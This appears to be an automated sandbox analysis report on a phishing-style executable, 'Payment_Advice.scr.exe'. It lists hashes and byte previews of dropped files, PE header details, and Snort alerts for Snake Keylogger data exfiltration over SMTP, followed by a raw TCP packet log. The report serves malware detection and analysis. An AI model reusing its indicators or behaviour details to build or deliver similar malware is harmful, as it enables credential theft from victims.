SHA1:	49EBA0B41409813B542406657EBFCE3A5A76F6E4
SHA-256:	0BE9903C76C00B587F57514E2C808EFD1443F38B94A17B67689E51FD9067C69A
SHA-512:	DCDB14E56E0B9811B415172243B6A21CDEAFA894A563E5562DEFFA74522E8E5FAD26B33BEB781D28BD39FEC49145072BAA4919AE733D08669214C7212E559293
Malicious:	false
Preview:	05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\1737b78a-138b-4575-9e85-395b8f616b4a.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
MD5:	716C2C392DCD15C95BBD760EEBABFCD0
SHA1:	4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
SHA-256:	DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
SHA-512:	E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\c5a735db-1617-4dde-a156-30851dbce141.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\e0ab29aa-2bff-4421-a708-3599d1536500.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\eeecf0b8-3932-4dbd-806b-a98e2ecda46d.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xaWL07oXGZGwYIGNPJwdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JaWLxXGZGwZGM3mlind9i4ufFXpAXkru
MD5:	0A347312E361322436D1AF1D5145D2AB
SHA1:	1D6C06A274705F8A295F62AD90CF8CA27555C226
SHA-256:	094501B3CA4E93F626ABFCAE800645C533B61409DC3D1D233F4D053CE6A124D7
SHA-512:	9856C231513B47DD996488DF19EEE44DBB320E55432984C0C041EF568B6EC5C05F5340831132890D1D162E0505CA243D579582EDB9157CF722A86EC8CE2FEAFE
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Temp\hadvices.scr

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1041408
Entropy (8bit):	6.655555563448097
Encrypted:	false
SSDEEP:	12288:vjU00pFjzc/AKVH/bcZb8lSnnJ8HMiEJy5EDbRFd1Sch9hNiERMDUIPMbP:H0s39wuEJ8U1hVRMDUzbP
MD5:	012DE24142F859797FBB5A25A7A3290D
SHA1:	85D6C307D84921B5A914D083FDB7DB22F2AAE865
SHA-256:	17E0BBF042B7403409739925E10C2FCF406C4DC269C189BCAABC8693A2F95D9B
SHA-512:	B3A58F443FACAAC2571CDCB21D188D2716923C9405841310D674180D755EBA47FC34C2A027DBB67BC27FA733E9066A6809E9658EA90D919C4540E4B968F4C94F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\Temp\hadvices.scr, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 35%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3...............0.................. ........@.. .......................@............@.....................................S............................ ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......................D...............................................@....+.......>.."V...]...}..D...........@....+.."V..D........ .......,...+..'W...V..G.....................................@.......0.......................@.......0.......................@.......0.....Y.......~....".. ........................................._!._&._,._.._?._^._\|._\|\|._S.+.A.AA.ADV.AE.AEX.AH.AI...AN..AO.AOE.AOX...API.ASP.ATR.AU...AX.AXR.B.BB.BH.BIM.BVA.BVD.C.CC...CC2.CCK.CEN.CH...CH2.CJ.CT.C

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.460718995298832
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment_Advice.scr.exe
File size:	957'440 bytes
MD5:	49c97a3774c358b5fcbff920382a44f7
SHA1:	3714d51172cf0a3bbc6ab4ce2e7856cf4c26f30a
SHA256:	5f7f4ac493fd1b0840fcd25980ac12a86df921c8ec14e9de9c03ba29ab7ec1c5
SHA512:	b8b08027d3416f1f58839affcca0df40aa769c7ba35cf23b1a672f54231040f7af3584087dc597a3db815f93265d136191965b58733d2024aeea6614aee9f61f
SSDEEP:	12288:/jU00pFjzc/AK59r4atz4ca3F58HMiEJy5jKO70EWOH2TvIPMbP:X0s35N4atj+/8cOKDzbP
TLSH:	37157A5A3BE40656DDBA433F60EB49396BB9EC0A2313EB0F0341B57A3C53398D8515A7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3...............0.............^.... ........@.. ....................................@................................

File Icon


Icon Hash:	131313132b1fdf7a

Static PE Info

General

Entrypoint:	0x4e9f5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xDD330B0C [Thu Aug 7 15:51:40 2087 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add eax, dword ptr [eax]
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+0000000Eh], al
dec eax
add byte ptr [eax], al
adc byte ptr [eax], 00000000h
add byte ptr [eax], al
pushad

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe9f04	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xea000	0x17de	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xec000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe7f64	0xe8000	50118512e35ff4f53693d22e8f9218cc	False	0.4728909196524784	data	6.463364392753374	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xea000	0x17de	0x1800	9ccef08a300330aaa90276b1aac0e318	False	0.55712890625	data	5.8401717473405785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xec000	0xc	0x200	4914d690efa40be37f73e85cc9ffeba4	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xea130	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.6090525328330206
RT_GROUP_ICON	0xeb1d8	0x14	data	1.1
RT_VERSION	0xeb1ec	0x408	data	0.3953488372093023
RT_MANIFEST	0xeb5f4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/01/24-15:18:24.979513	TCP	2044767	ET TROJAN Snake Keylogger Exfil via SMTP	49750	587	192.168.2.6	108.167.142.65
05/01/24-15:18:37.550574	TCP	2044767	ET TROJAN Snake Keylogger Exfil via SMTP	49751	587	192.168.2.6	108.167.142.65
05/01/24-15:18:39.976646	TCP	2044767	ET TROJAN Snake Keylogger Exfil via SMTP	49752	587	192.168.2.6	108.167.142.65

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 1, 2024 15:17:07.153165102 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.153203964 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.153280973 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.164690971 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.164709091 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.374743938 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.374816895 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.382890940 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.382908106 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.383233070 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.393697023 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.436129093 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.844681025 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.844727993 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.844758034 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.844785929 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.844818115 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.844825983 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.844867945 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.844886065 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.844913960 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.844921112 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.844945908 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.845380068 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.845423937 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.845431089 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.845464945 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.845469952 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.845499039 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.845525026 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.845563889 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.845571995 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.845609903 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.846239090 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.846282959 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.846328974 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.846337080 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.846386909 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.846415043 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.846432924 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.846441031 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.846479893 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.847240925 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.847304106 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.847330093 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.847354889 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.847361088 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.847398043 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.847409010 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.848047972 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.848073959 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.848117113 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.848124027 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.848154068 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.848177910 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.848185062 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.848229885 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.848237991 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.848973036 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.848999977 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.849026918 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.849042892 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.849051952 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.849069118 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.849078894 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.849117041 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.849123955 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.890218973 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.896945000 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.897216082 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.897239923 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.897274017 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.897284031 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.897326946 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.897547007 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.897603035 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.897650957 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.897656918 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.897696972 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.938664913 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.938760042 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.939131021 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.939178944 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.939191103 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.939202070 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.939225912 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.939770937 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.939819098 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.939826012 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.939868927 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.940548897 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.940613031 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.940623999 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.940639973 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.940663099 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.940669060 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.940696001 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.941715002 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.941761971 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.941768885 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.941780090 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.941843033 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.941843033 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.941849947 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.942379951 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.942430019 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.942436934 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.942481041 CEST	49710	443	192.168.2.6	104.21.27.63
